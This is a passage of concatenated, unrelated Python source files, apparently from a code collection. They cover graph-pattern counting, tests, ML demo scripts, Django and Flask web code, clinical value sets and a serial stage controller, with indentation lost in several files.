sys.stderr    # standard error
# commonly used attributes and functions of the sys module
'''
# print(sys.path)
# print(os.getcwd())
# os.chdir("E:\\linuxvideo")
# print(os.getcwd())
# makedirs(name, mode=0o777, exist_ok=False):
# os.makedirs(r"aa\bb\cc")
# os.removedirs(r"aa\bb")
# print(os.listdir(os.getcwd()))
# print(os.stat("file.py").st_size)
# os.rename("aa","bb")
#
# print(__file__)  # path/file name of the current file
# print(os.path.abspath(__file__))
# print(os.path.split(os.path.abspath(__file__)))
print(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))  # parent directory of the directory containing this file
# os.path.join(path1[, path2[, ...]])  join multiple paths and return the result; arguments before the first absolute path are ignored
# print(os.path.join("d:\\"))
# print(os.path.join("d:\\","www","baidu","a.py"))
print(os.getcwd())
print(os.path.dirname(os.path.abspath(__file__)))
print(os.path.join(os.path.dirname(os.path.abspath(__file__)),"bb","123.txt"))
|
499843
|
from collections import Counter
from graphbrain import hedge
from graphbrain.hyperedge import edge_matches_pattern
argrole_order = {
'm': -1,
's': 0,
'p': 1,
'a': 2,
'c': 3,
'o': 4,
'i': 5,
't': 6,
'j': 7,
'x': 8,
'r': 9,
'?': 10
}
def normalize_edge(edge):
if edge.is_atom():
return edge
conn = edge[0]
ar = conn.argroles()
if ar != '':
roles_edges = zip(ar, edge[1:])
roles_edges = sorted(roles_edges,
key=lambda role_edge: argrole_order[role_edge[0]])
ar = ''.join([role_edge[0] for role_edge in roles_edges])
pred = conn.atom()
new_pred = hedge('{}/{}.{}'.format(pred.root(), pred.type(), ar))
conn = conn.replace_atom(pred, new_pred)
edge = hedge([conn] + list(role_edge[1] for role_edge in roles_edges))
return hedge([normalize_edge(subedge) for subedge in edge])
def edge2pattern(edge, root=False, subtype=False):
if root and edge.is_atom():
root_str = edge.root()
else:
root_str = '*'
if subtype:
et = edge.type()
else:
et = edge.type()[0]
pattern = '{}/{}'.format(root_str, et)
ar = edge.argroles()
if ar == '':
return hedge(pattern)
else:
return hedge('{}.{}'.format(pattern, ar))
def inner_edge_matches_pattern(edge, pattern):
if edge.is_atom():
return False
for subedge in edge:
if edge_matches_pattern(subedge, pattern):
return True
for subedge in edge:
if inner_edge_matches_pattern(subedge, pattern):
return True
return False
class PatternCounter:
def __init__(self,
depth=2,
count_subedges=True,
expansions={'*'},
match_roots=set(),
match_subtypes=set()):
self.patterns = Counter()
self.depth = depth
self.count_subedges = count_subedges
self.expansions = expansions
self.match_roots = match_roots
self.match_subtypes = match_subtypes
def _matches_expansions(self, edge):
for expansion in self.expansions:
if edge_matches_pattern(edge, expansion):
return True
return False
def _force_subtypes(self, edge):
force_subtypes = False
for st_pattern in self.match_subtypes:
if edge_matches_pattern(edge, st_pattern):
force_subtypes = True
return force_subtypes
def _force_root_expansion(self, edge):
force_root = False
force_expansion = False
for root_pattern in self.match_roots:
if edge_matches_pattern(edge, root_pattern):
force_root = True
force_expansion = True
elif inner_edge_matches_pattern(edge, root_pattern):
force_expansion = True
return force_root, force_expansion
def _list2patterns(self, ledge, depth=1, force_expansion=False,
force_root=False, force_subtypes=False):
if depth > self.depth:
return []
first = ledge[0]
f_force_subtypes = force_subtypes | self._force_subtypes(first)
f_force_root, f_force_expansion = self._force_root_expansion(first)
f_force_root |= force_root
f_force_expansion |= force_expansion
root = force_root | f_force_root
if f_force_expansion and not first.is_atom():
hpats = []
else:
hpats = [edge2pattern(first, root=root, subtype=f_force_subtypes)]
if not first.is_atom() and (self._matches_expansions(first) or
f_force_expansion):
hpats += self._list2patterns(
list(first), depth + 1, force_expansion=f_force_expansion,
force_root=f_force_root, force_subtypes=f_force_subtypes)
if len(ledge) == 1:
patterns = [[hpat] for hpat in hpats]
else:
patterns = []
for pattern in self._list2patterns(
ledge[1:], depth=depth, force_expansion=force_expansion,
force_root=force_root, force_subtypes=force_subtypes):
for hpat in hpats:
patterns.append([hpat] + pattern)
return patterns
def _edge2patterns(self, edge):
force_subtypes = self._force_subtypes(edge)
force_root, _ = self._force_root_expansion(edge)
return list(hedge(pattern)
for pattern
in self._list2patterns(list(normalize_edge(edge)),
force_subtypes=force_subtypes,
force_root=force_root,
force_expansion=False))
def count(self, edge):
if not edge.is_atom():
if self._matches_expansions(edge):
for pattern in self._edge2patterns(edge):
self.patterns[hedge(pattern)] += 1
if self.count_subedges:
for subedge in edge:
self.count(subedge)
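# Hedged usage sketch (the edge string is illustrative and assumes graphbrain's
# usual hyperedge notation): feed parsed hyperedges to count() and inspect the
# most frequent generalized patterns afterwards.
#
#   pc = PatternCounter(depth=2, count_subedges=True)
#   pc.count(hedge('(is/Pd.sc mary/Cp nice/Ca)'))
#   print(pc.patterns.most_common(5))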
|
499898
|
from dataclasses import dataclass
from typing import Iterator, List, Set, Tuple
@dataclass(frozen=True)
class Range:
min_val: int
max_val: int
def lits_to_ranges(
literals: Iterator[int],
) -> Tuple[Set[int], Set[Range]]:
lits = set()
ranges = set()
buf: List[int] = []
for lit in sorted(literals):
if len(buf) and buf[-1] != lit - 1:
# Discontinuity
if len(buf) < 3:
lits.update(buf)
else:
ranges.add(Range(buf[0], buf[-1]))
buf = [lit]
else:
buf.append(lit)
if len(buf) == 1:
lits.add(buf[0])
elif len(buf) > 1:
ranges.add(Range(buf[0], buf[-1]))
return lits, ranges
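# Minimal usage sketch (the literal values are illustrative): runs of
# consecutive literals collapse into Range objects, while isolated values stay
# as bare literals.
#
#   lits, ranges = lits_to_ranges(iter([1, 2, 3, 7, 9, 10, 11, 12]))
#   # lits   == {7}
#   # ranges == {Range(1, 3), Range(9, 12)}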
|
499904
|
from rpython.rlib.objectmodel import specialize
class Cache(object):
def __init__(self, space):
self.space = space
self.contents = {}
@specialize.memo()
def getorbuild(self, key):
try:
return self.contents[key]
except KeyError:
builder = self._build(key)
self.contents[key] = builder.next()
try:
builder.next()
except StopIteration:
pass
else:
raise RuntimeError("generator didn't stop")
return self.contents[key]
def _freeze_(self):
return True
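# Minimal sketch of the expected subclass protocol (illustrative only):
# _build(key) must return a generator that yields exactly one value;
# getorbuild() memoizes that value and raises RuntimeError if the generator
# yields more than once.
#
#   class TypeCache(Cache):
#       def _build(self, key):
#           yield make_type_object(self.space, key)   # hypothetical helper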
|
500001
|
import pytest
from conftest import generate_unique_name
from lahja import AsyncioEndpoint, ConnectionConfig
@pytest.mark.asyncio
async def test_endpoint_run():
endpoint = AsyncioEndpoint("test-run")
assert endpoint.is_running is False
async with endpoint.run():
assert endpoint.is_running is True
assert endpoint.is_running is False
@pytest.mark.asyncio
async def test_endpoint_run_with_error():
endpoint = AsyncioEndpoint("test-run")
assert endpoint.is_running is False
with pytest.raises(Exception, match="break out of run"):
async with endpoint.run():
assert endpoint.is_running is True
raise Exception("break out of run")
assert endpoint.is_running is False
@pytest.mark.asyncio
async def test_endpoint_serve(ipc_base_path):
config = ConnectionConfig.from_name(generate_unique_name(), base_path=ipc_base_path)
async with AsyncioEndpoint.serve(config) as endpoint:
assert endpoint.is_running is True
assert endpoint.is_serving is True
assert endpoint.is_running is False
assert endpoint.is_serving is False
@pytest.mark.asyncio
async def test_endpoint_serve_with_error(ipc_base_path):
config = ConnectionConfig.from_name(generate_unique_name(), base_path=ipc_base_path)
with pytest.raises(Exception, match="break out of serve"):
async with AsyncioEndpoint.serve(config) as endpoint:
assert endpoint.is_running is True
assert endpoint.is_serving is True
raise Exception("break out of serve")
assert endpoint.is_running is False
assert endpoint.is_serving is False
|
500031
|
from collections import defaultdict
from sklearn.metrics import adjusted_mutual_info_score, normalized_mutual_info_score
def ami(p1, p2):
return adjusted_mutual_info_score(p1, p2)
def nmi(p1, p2):
return normalized_mutual_info_score(p1, p2, average_method='arithmetic')
def all_degrees(G):
return G.degree()
def in_degrees(G):
return G.indegree()
def out_degrees(G):
return G.outdegree()
def membership_to_communities(membership):
communities = defaultdict(list)
for v, c in enumerate(membership):
communities[c].append(v)
return communities
def membership_to_layered_communities(membership, layer_membership):
layered_communities = defaultdict(list)
for v, c in enumerate(membership):
layered_communities[(c, layer_membership[v])].append(v)
return layered_communities
def num_communities(membership):
n = len(set(membership))
assert n == max(membership) + 1
return n
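# Minimal usage sketch (the membership list is illustrative): community labels
# are assumed to be contiguous integers starting at 0.
#
#   membership_to_communities([0, 0, 1, 1, 1])   # -> {0: [0, 1], 1: [2, 3, 4]}
#   num_communities([0, 0, 1, 1, 1])             # -> 2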
|
500071
|
from datetime import datetime
from pytz import timezone, UnknownTimeZoneError
from typing import Union
from .baseclasses import AbsoluteDateTime, RelativeDateTime
from .enums import Method
from .evaluatormethods import EvaluatorMethods
class Evaluator:
def __init__(self, parsed_object, tz="Europe/Berlin"):
"""
:param parsed_object: the parsed object from parser
:param tz: the timezone for the datetime
"""
try:
tiz = timezone(tz)
except UnknownTimeZoneError:
raise ValueError("Unknown timezone: {}".format(tz))
self.parsed_object_type = parsed_object[0]
self.parsed_object_content: Union[list, AbsoluteDateTime, RelativeDateTime] = parsed_object[1]
self.current_datetime: datetime = datetime.strptime(datetime.strftime(datetime.now(tz=tiz), "%Y-%m-%d %H:%M:%S"), "%Y-%m-%d %H:%M:%S")
self.offset = tiz.utcoffset(self.current_datetime)
def evaluate(self) -> Union[datetime, None]:
ev_out = None
ev = EvaluatorMethods(self.parsed_object_content, self.current_datetime, self.offset)
if self.parsed_object_type == Method.ABSOLUTE_DATE_FORMATS:
ev_out = ev.evaluate_absolute_date_formats()
if self.parsed_object_type == Method.ABSOLUTE_PREPOSITIONS:
ev_out = ev.evaluate_absolute_prepositions()
if self.parsed_object_type == Method.CONSTANTS:
ev_out = ev.evaluate_constants()
if self.parsed_object_type == Method.RELATIVE_DATETIMES:
ev_out = ev.evaluate_relative_datetime()
if self.parsed_object_type == Method.CONSTANTS_RELATIVE_EXTENSIONS:
ev_out = ev.evaluate_constant_relatives()
if self.parsed_object_type == Method.DATETIME_DELTA_CONSTANTS:
ev_out = ev.evaluate_datetime_delta_constants()
if ev_out:
return ev_out
else:
            raise ValueError("could not evaluate parsed object of type {}".format(self.parsed_object_type))
|
500157
|
class HokiDialogue(object):
def __init__(self):
self.RED = '\u001b[31;1m'
self.ORANGE = '\u001b[33;1m'
self.GREEN = '\u001b[32;1m'
self.BLUE = '\u001b[36;1m'
self.ENDC = '\033[0m'
self.BOLD = '\033[1m'
self.UND = '\033[4m'
self.BCKG='\u001b[46;1m'
def info(self):
return f'{self.GREEN}[---INFO---]{self.ENDC}'
def running(self):
return f'{self.ORANGE}[--RUNNING-]{self.ENDC}'
def complete(self):
return f'{self.BLUE}[-COMPLETE-]{self.ENDC}'
def debugger(self):
return f'{self.ORANGE}DEBUGGING ASSISTANT:{self.ENDC}'
def error(self):
return f'{self.RED}HOKI ERROR:{self.ENDC}'
dialogue = HokiDialogue()
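# Hedged usage sketch (the message strings are illustrative): the module-level
# `dialogue` instance is meant to prefix console messages with coloured status
# tags, e.g.
#
#   print(f'{dialogue.info()} Loading stellar models')
#   print(f'{dialogue.error()} Input file not found')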
|
500163
|
import os, sys
import numpy as np
import torch.backends.cudnn as cudnn
import torch
from tqdm import tqdm
import argparse
import cv2
import imageio
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from pixielib.pixie import PIXIE
from pixielib.visualizer import Visualizer
from pixielib.datasets.body_datasets import TestData
from pixielib.utils import util
from pixielib.utils.config import cfg as pixie_cfg
def main(args):
savefolder = args.savefolder
device = args.device
os.makedirs(savefolder, exist_ok=True)
# check env
if not torch.cuda.is_available():
print('CUDA is not available! use CPU instead')
else:
cudnn.benchmark = True
torch.backends.cudnn.deterministic = False
torch.backends.cudnn.enabled = True
# load test images
testdata = TestData(args.inputpath, iscrop=args.iscrop, body_detector='rcnn')
# load video for animation sequence
posedata = TestData(args.posepath, iscrop=args.iscrop, body_detector='rcnn')
#-- run PIXIE
pixie_cfg.model.use_tex = args.useTex
pixie = PIXIE(config = pixie_cfg, device=device)
visualizer = Visualizer(render_size=args.render_size, config = pixie_cfg, device=device, rasterizer_type=args.rasterizer_type)
# 1. fit smplx of given image
batch = testdata[0]
util.move_dict_to_device(batch, device)
batch['image'] = batch['image'].unsqueeze(0)
batch['image_hd'] = batch['image_hd'].unsqueeze(0)
name = batch['name']
input_image = batch['image']
data = {
'body': batch
}
param_dict = pixie.encode(data)
input_codedict = param_dict['body']
# vis smplx results
input_opdict = pixie.decode(input_codedict, param_type='body')
input_opdict['albedo'] = visualizer.tex_flame2smplx(input_opdict['albedo'])
visdict = visualizer.render_results(input_opdict, data['body']['image_hd'], overlay=True)
input_image = batch['image_hd'].clone()
input_shape = visdict['shape_images'].clone()
# 2. get the pose/expression of given animation sequence
os.makedirs(os.path.join(savefolder, name), exist_ok=True)
writer = imageio.get_writer(os.path.join(savefolder, 'animation.gif'), mode='I')
for i, batch in enumerate(tqdm(posedata, dynamic_ncols=True)):
if i % 1 ==0:
util.move_dict_to_device(batch, device)
batch['image'] = batch['image'].unsqueeze(0)
batch['image_hd'] = batch['image_hd'].unsqueeze(0)
data = {
'body': batch
}
param_dict = pixie.encode(data)
codedict = param_dict['body']
moderator_weight = param_dict['moderator_weight']
opdict = pixie.decode(codedict, param_type='body')
if args.reproject_mesh and args.rasterizer_type=='standard':
## whether to reproject mesh to original image space
tform = batch['tform'][None, ...]
tform = torch.inverse(tform).transpose(1,2)
original_image = batch['original_image'][None, ...]
visualizer.recover_position(opdict, batch, tform, original_image)
visdict = visualizer.render_results(opdict, data['body']['image_hd'], moderator_weight=moderator_weight, overlay=True)
pose_ref_shape = visdict['color_shape_images'].clone()
# transfer pose and expression
for param in ['shape', 'tex', 'body_cam', 'light']:
codedict[param] = input_codedict[param]
opdict = pixie.decode(codedict, param_type='body')
opdict['albedo'] = input_opdict['albedo']#visualizer.tex_flame2smplx(opdict['albedo'])
visdict = visualizer.render_results(opdict, input_image)
transfered_shape = visdict['shape_images'].clone()
visdict = {
'input': input_image,
'rec': input_shape,
'transfer': transfered_shape,
# 'rendered_images': visdict['rendered_images'],
'pose_ref': batch['image_hd'],
'pose_ref_shape': pose_ref_shape
}
grid_image_all = visualizer.visualize_grid(visdict, size=512)
cv2.imwrite(os.path.join(savefolder, name, f'{name}_animate_{i:05}.jpg'), grid_image_all)
writer.append_data(grid_image_all[:,:,[2,1,0]])
writer.close()
print(f'-- please check the results in {savefolder}')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='PIXIE')
parser.add_argument('-i', '--inputpath', default='TestSamples/body/woman-in-white-dress-3830468.jpg', type=str,
help='path to the test data, can be image folder, image path, image list, video')
parser.add_argument('-p', '--posepath', default='TestSamples/animation', type=str,
help='path to the test data, can be image folder, image path, image list, video')
parser.add_argument('-s', '--savefolder', default='TestSamples/animation', type=str,
help='path to the output directory, where results(obj, txt files) will be stored.')
parser.add_argument('--device', default='cuda:0', type=str,
help='set device, cpu for using cpu' )
# process test images
parser.add_argument('--iscrop', default=True, type=lambda x: x.lower() in ['true', '1'],
                        help='whether to crop the input image; set False only when the test images are already well cropped' )
# rendering option
parser.add_argument('--render_size', default=1024, type=int,
help='image size of renderings' )
parser.add_argument('--rasterizer_type', default='standard', type=str,
help='rasterizer type: pytorch3d or standard' )
parser.add_argument('--reproject_mesh', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to reproject the mesh and render it in original image size, \
currently only available if rasterizer_type is standard, because pytorch3d does not support non-squared image...\
default is False, means use the cropped image and its corresponding results')
# save
parser.add_argument('--deca_path', default=None, type=str,
help='absolute path of DECA folder, if exists, will return facial details by running DECA\
details of DECA: https://github.com/YadiraF/DECA' )
parser.add_argument('--useTex', default=True, type=lambda x: x.lower() in ['true', '1'],
help='whether to use FLAME texture model to generate uv texture map, \
set it to True only if you downloaded texture model' )
parser.add_argument('--uvtex_type', default='SMPLX', type=str,
help='texture type to save, can be SMPLX or FLAME')
parser.add_argument('--saveVis', default=True, type=lambda x: x.lower() in ['true', '1'],
help='whether to save visualization of output' )
parser.add_argument('--saveGif', default=True, type=lambda x: x.lower() in ['true', '1'],
help='whether to visualize other views of the output, save as gif' )
parser.add_argument('--saveObj', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to save outputs as .obj, \
Note that saving objs could be slow' )
parser.add_argument('--saveParam', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to save parameters as pkl file' )
parser.add_argument('--savePred', default=False, type=lambda x: x.lower() in ['true', '1'],
help='whether to save smplx prediction as pkl file' )
parser.add_argument('--saveImages', default=False, type=lambda x: x.lower() in ['true', '1'],
                        help='whether to save visualization output as separate images' )
main(parser.parse_args())
|
500172
|
from .base import *
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
DEBUG = False
ALLOWED_HOSTS = ['*']
|
500181
|
from flask import Blueprint, render_template, request, redirect, url_for, flash
import requests
import logging
import utils
log = logging.getLogger("Nurevam.site")
blueprint = Blueprint('memes', __name__, template_folder='../templates/memes')
name = "memes"
description = "Allow to post a custom memes you like!"
db = None #Database
@utils.plugin_page('memes')
def dashboard(server_id):
log.info("loading cog pages")
db_role = db.smembers('{}:Memes:editor_role'.format(server_id)) or []
get_role = utils.resource_get("/guilds/{}".format(server_id))
guild_roles = get_role['roles']
role = list(filter(lambda r: r['name'] in db_role or r['id'] in db_role, guild_roles))
return {"roles": role, "guild_roles": guild_roles}
@blueprint.route('/update/<int:server_id>', methods=['POST'])
@utils.plugin_method
def update_memes(server_id):
roles = request.form.get('roles').split(',')
db.delete("{}:Memes:editor_role".format(server_id))
if len(roles) > 0:
db.sadd("{}:Memes:editor_role".format(server_id), *roles)
return dashboard(server_id=server_id)
@blueprint.route("/<string:cog>/<int:server_id>/")
@utils.require_role
def memes(cog, server_id):
meme_link = db.hgetall("{}:Memes:link".format(server_id))
return render_template("memes.html", data_memes=meme_link, server_id=server_id)
@blueprint.route('/add/<string:cog>/<int:server_id>/', methods=['POST'])
@utils.require_role
def add_memes(cog, server_id):
name = request.form.get("meme_name")
link = request.form.get("meme_link")
status = utils.check_link(link)
if status == 0: # if is true
if name in db.smembers("{}:Memes:name".format(server_id)):
flash("This name already exists!", "warning")
else:
db.hset("{}:Memes:link".format(server_id), name, link)
db.sadd("{}:Memes:name".format(server_id), name)
flash("You have add a new memes!", "success")
return redirect(url_for("memes.memes", server_id=server_id, cog="memes"))
@blueprint.route('/update/<int:server_id>/<string:name>', methods=['POST'])
@utils.plugin_method
def edit_memes(server_id, name):
new_name = request.form.get("meme_name")
link = request.form.get("meme_link")
status = utils.check_link(link)
if status == 0:
# delete old database
db.hdel("{}:Memes:link".format(server_id), name)
db.srem("{}:Memes:name".format(server_id), name)
# adding, if there is a way to rename them in hash, that would be great...
db.hset("{}:Memes:link".format(server_id), new_name, link)
db.sadd("{}:Memes:name".format(server_id), new_name)
flash("Update data!", "success")
return redirect(url_for("memes.memes", server_id=server_id, cog="memes"))
@blueprint.route('/delete/<int:server_id>/<string:name>/', methods=['GET'])
@utils.plugin_method
def delete_memes(server_id, name):
# Deleting data
db.hdel("{}:Memes:link".format(server_id), name)
db.srem("{}:Memes:name".format(server_id), name)
return redirect(url_for("memes.memes", server_id=server_id, cog="Memes"))
|
500187
|
from torch.nn.modules.module import Module
from ..functions.roi_align_3d import RoIAlignFunction3D
class RoIAlign3D(Module):
def __init__(self, out_size, out_size_depth, spatial_scale, spatial_scale_depth, sample_num=0):
super(RoIAlign3D, self).__init__()
self.out_size = out_size
self.out_size_depth = out_size_depth
self.spatial_scale = float(spatial_scale)
self.spatial_scale_depth = float(spatial_scale_depth)
self.sample_num = int(sample_num)
def forward(self, features, rois):
return RoIAlignFunction3D.apply(features, rois, self.out_size, self.out_size_depth,
self.spatial_scale, self.spatial_scale_depth, self.sample_num)
|
500228
|
from ..factory import Type
class messageCall(Type):
discard_reason = None # type: "CallDiscardReason"
duration = None # type: "int32"
|
500240
|
from ..value_set import ValueSet
class PositiveFinding(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent positive test results. This is intended to be paired with other concepts that identify specific medical tests.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) attribute related to Result.
**Inclusion Criteria:** Includes only relevant concepts associated with identifying a positive test result.
**Exclusion Criteria:** Excludes concepts that identify a specific type of medical test.
"""
OID = '2.16.840.1.113883.3.464.1003.121.12.1016'
VALUE_SET_NAME = 'Positive Finding'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
SNOMEDCT = {
'441773004'
}
class TobaccoNonUser(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent tobacco non-user status.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) attribute related to Result.
**Inclusion Criteria:** Includes only relevant concepts associated with indicating a patient does not use tobacco products, including smoking and smoke-less tobacco products such as chew, snuff, pipe, cigarette, cigar, etc.
**Exclusion Criteria:** Excludes concepts that may indicate a current tobacco user status.
"""
OID = '2.16.840.1.113883.3.526.3.1189'
VALUE_SET_NAME = 'Tobacco Non-User'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
SNOMEDCT = {
'105539002',
'105540000',
'105541001',
'160618006',
'160620009',
'160621008',
'228491005',
'228492003',
'228493008',
'228501004',
'228502006',
'228503001',
'228511006',
'228512004',
'228513009',
'266919005',
'266921000',
'266922007',
'266923002',
'266924008',
'266925009',
'266928006',
'281018007',
'360890004',
'360900008',
'360918006',
'360929005',
'405746006',
'428081000124100',
'428091000124102',
'451371000124109',
'451381000124107',
'456711000124105',
'48031000119106',
'53896009',
'702975009',
'702979003',
'735128000',
'8392000',
'8517006',
'87739003'
}
class VisualAcuity2040OrBetter(ValueSet):
"""
**Clinical Focus:** This value set contains concepts that represent visual acuity findings that are 20/40 or better.
**Data Element Scope:** This value set may use the Quality Data Model (QDM) attribute related to Result.
**Inclusion Criteria:** Includes only relevant concepts associated with distance vision findings of 20/40 or better.
**Exclusion Criteria:** No exclusions.
"""
OID = '2.16.840.1.113883.3.526.3.1483'
VALUE_SET_NAME = 'Visual Acuity 20/40 or Better'
EXPANSION_VERSION = 'eCQM Update 2020-05-07'
SNOMEDCT = {
'422497000',
'423059004',
'423364005',
'423862000',
'424703005'
}
|
500295
|
import bayesnewton
import objax
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import time
import tikzplotlib
print('loading rainforest data ...')
data = np.loadtxt('../data/TRI2TU-data.csv', delimiter=',')
nr = 50  # spatial grid points (y-axis)
nt = 100 # temporal grid points (x-axis)
binsize = 1000 / nt
t, r, Y_ = bayesnewton.utils.discretegrid(data, [0, 1000, 0, 500], [nt, nr])
t_flat, r_flat, Y_flat = t.flatten(), r.flatten(), Y_.flatten()
N = nr * nt # number of data points
np.random.seed(99)
test_ind = np.random.permutation(N)[:N//10]
t_test = t_flat[test_ind]
r_test = r_flat[test_ind]
Y_test = Y_flat[test_ind]
Y_flat[test_ind] = np.nan
Y = Y_flat.reshape(nt, nr)
# put test points on a grid to speed up prediction
X_test = np.concatenate([t_test[:, None], r_test[:, None]], axis=1)
t_test, r_test, Y_test = bayesnewton.utils.create_spatiotemporal_grid(X_test, Y_test)
var_f = 1. # GP variance
len_f = 20. # lengthscale
kern = bayesnewton.kernels.SpatialMatern32(variance=var_f, lengthscale=len_f, z=r[0, ...], sparse=False)
# kern = bayesnewton.kernels.SpatialMatern32(variance=var_f, lengthscale=len_f, z=r[0, ...], sparse=True)
lik = bayesnewton.likelihoods.Poisson(binsize=binsize)
# lik = bayesnewton.likelihoods.Gaussian(variance=1)
# model = bayesnewton.models.VariationalGP(kernel=kern, likelihood=lik, X=x, Y=Y)
model = bayesnewton.models.MarkovVariationalGP(kernel=kern, likelihood=lik, X=t, R=r, Y=Y)
# model = bayesnewton.models.MarkovVariationalGP(kernel=kern, likelihood=lik, X=t_flat, R=r_flat, Y=Y_flat)
# model = bayesnewton.models.InfiniteHorizonVariationalGP(kernel=kern, likelihood=lik, X=t, R=r, Y=Y)
# model = bayesnewton.models.MarkovVariationalGPMeanField(kernel=kern, likelihood=lik, X=t, R=r, Y=Y)
lr_adam = 0.2
lr_newton = 0.2
iters = 10
opt_hypers = objax.optimizer.Adam(model.vars())
energy = objax.GradValues(model.energy, model.vars())
@objax.Function.with_vars(model.vars() + opt_hypers.vars())
def train_op():
model.inference(lr=lr_newton) # perform inference and update variational params
dE, E = energy() # compute energy and its gradients w.r.t. hypers
opt_hypers(lr_adam, dE)
test_nlpd_ = model.negative_log_predictive_density(X=t_test, R=r_test, Y=Y_test)
return E, test_nlpd_
train_op = objax.Jit(train_op)
t0 = time.time()
for i in range(1, iters + 1):
loss, test_nlpd = train_op()
print('iter %2d, energy: %1.4f, nlpd: %1.4f' % (i, loss[0], test_nlpd))
t1 = time.time()
print('optimisation time: %2.2f secs' % (t1-t0))
# calculate posterior predictive distribution via filtering and smoothing at train & test locations:
print('calculating the posterior predictive distribution ...')
t0 = time.time()
posterior_mean, posterior_var = model.predict(X=t, R=r)
# posterior_mean_y, posterior_var_y = model.predict_y(X=t, R=r)
nlpd = model.negative_log_predictive_density(X=t_test, R=r_test, Y=Y_test)
t1 = time.time()
print('prediction time: %2.2f secs' % (t1-t0))
print('nlpd: %2.3f' % nlpd)
link_fn = lik.link_fn
print('plotting ...')
cmap = cm.viridis
plt.figure(1, figsize=(10, 5))
plt.plot(data[:, 0], data[:, 1], 'k.', markersize=2)
plt.title('Tree locations')
plt.xlim(0, 1000)
plt.ylim(0, 500)
plt.figure(2, figsize=(10, 5))
im = plt.imshow(Y_.T / binsize, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
plt.colorbar(im, fraction=0.0235, pad=0.04)
plt.title('Tree count data (full).')
plt.figure(3, figsize=(10, 5))
im = plt.imshow(Y.T / binsize, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
plt.colorbar(im, fraction=0.0235, pad=0.04)
plt.title('Tree count data (with missing values).')
plt.figure(4, figsize=(10, 5))
im = plt.imshow(link_fn(posterior_mean).T, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
# im = plt.imshow(posterior_mean_y.T, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
plt.colorbar(im, fraction=0.0235, pad=0.04)
plt.xlim(0, 1000)
plt.ylim(0, 500)
# plt.title('2D log-Gaussian Cox process (rainforest tree data). Log-intensity shown.')
plt.title('2D log-Gaussian Cox process (rainforest tree data). Tree intensity per $m^2$.')
plt.xlabel('first spatial dimension, $t$ (metres)')
plt.ylabel('second spatial dimension, $r$ (metres)')
# plt.figure(5, figsize=(10, 5))
# plt.plot(data[:, 0], data[:, 1], 'k.', markersize=2)
# bayesnewton.utils.bitmappify(plt.gca(), 200)
# plt.xlabel('first spatial dimension, $t$ (metres)')
# plt.ylabel('second spatial dimension, $\\Space$ (metres)')
# plt.xlim(0, 1000)
# plt.ylim(0, 500)
# tikzplotlib.save('/Users/wilkinw1/postdoc/inprogress/ati-fcai/paper/icml2021/fig/tree_locations.tex',
# axis_width='\\figurewidth',
# axis_height='\\figureheight',
# tex_relative_path_to_data='./fig/')
#
# plt.figure(6, figsize=(10, 5))
# im = plt.imshow(link_fn(posterior_mean).T, cmap=cmap, extent=[0, 1000, 0, 500], origin='lower')
# plt.xlim(0, 1000)
# plt.ylim(0, 500)
# plt.xlabel('first spatial dimension, $t$ (metres)')
# plt.ylabel('\\phantom{second spatial dimension, $\\Space$ (metres)}')
# tikzplotlib.save('/Users/wilkinw1/postdoc/inprogress/ati-fcai/paper/icml2021/fig/tree_posterior.tex',
# axis_width='\\figurewidth',
# axis_height='\\figureheight',
# tex_relative_path_to_data='./fig/')
plt.show()
|
500296
|
import time
import serial
try:
import numpy as np
except ImportError:
np = None # You won't be able to use retrieve_data_log()
class C867_XY_Stage:
def __init__(self, which_port, verbose=True):
try:
self.port = serial.Serial(
port=which_port, baudrate=115200, timeout=1)
except:
print("Failed to open serial port", which_port, "for PI stage.",
"Is it on, plugged in, and on the serial port you think?")
raise
self.verbose = verbose
self._moving = False
self._joystick_enabled = True
# The joystick has a 'startup macro', to make sure it behaves as
# desired after power switches on. Make sure nobody messed with
# our startup macro:
self._set_startup_macro()
# Get our initial conditions:
self.get_position()
self.get_velocity()
self.get_acceleration()
# Get position and velocity limits so we can validate user input:
if self.verbose: print("Getting stage limits...")
self.x_min, self.y_min = [
float(a.split('=')[1]) for a in self.send('TMN? 1 2')]
self.x_max, self.y_max = [
float(a.split('=')[1]) for a in self.send('TMX? 1 2')]
self.vx_max, self.vy_max = [
float(a.split('=')[1]) for a in self.send('SPA? 1 0xA 2 0xA')]
self.ax_max, self.ay_max = [
float(a.split('=')[1]) for a in self.send('SPA? 1 0x4A 2 0x4A')]
self.dx_max, self.dy_max = [
float(a.split('=')[1]) for a in self.send('SPA? 1 0x4B 2 0x4B')]
if self.verbose:
print(" Stage x-limits:", self.x_min, self.x_max)
print(" Stage y-limits:", self.y_min, self.y_max)
print(" Stage v-limits:", self.vx_max, self.vy_max)
print(" Stage a-limits:", self.ax_max, self.ay_max)
print(" Stage d-limits:", self.dx_max, self.dy_max, '\n')
return None
def send(self, cmd, res=True):
if self.verbose: print(" Sending command to stage:", cmd)
# Allow cmd to be bytes or string
if type(cmd) is str: cmd = bytes(cmd, encoding='ascii')
assert type(cmd) is bytes
# Communicate:
self.port.write(cmd + b'\n')
responses = []
while res:
response = self.port.readline()
assert response.endswith(b'\n') # We timed out
if self.verbose: print(" Response from stage:", response)
responses.append(response.rstrip().decode('ascii'))
# Non-final responses have a trailing space:
if len(response) == 1: break
if response[-2] != 32: break
# Cleanup:
assert self.port.in_waiting == 0
self._check_errors()
return responses
def move(self, x=None, y=None, blocking=True):
assert x is not None or y is not None
self.finish_moving()
if self.verbose: print("Starting stage motion...")
if self._joystick_enabled:
self.send('JON 3 0', res=False)
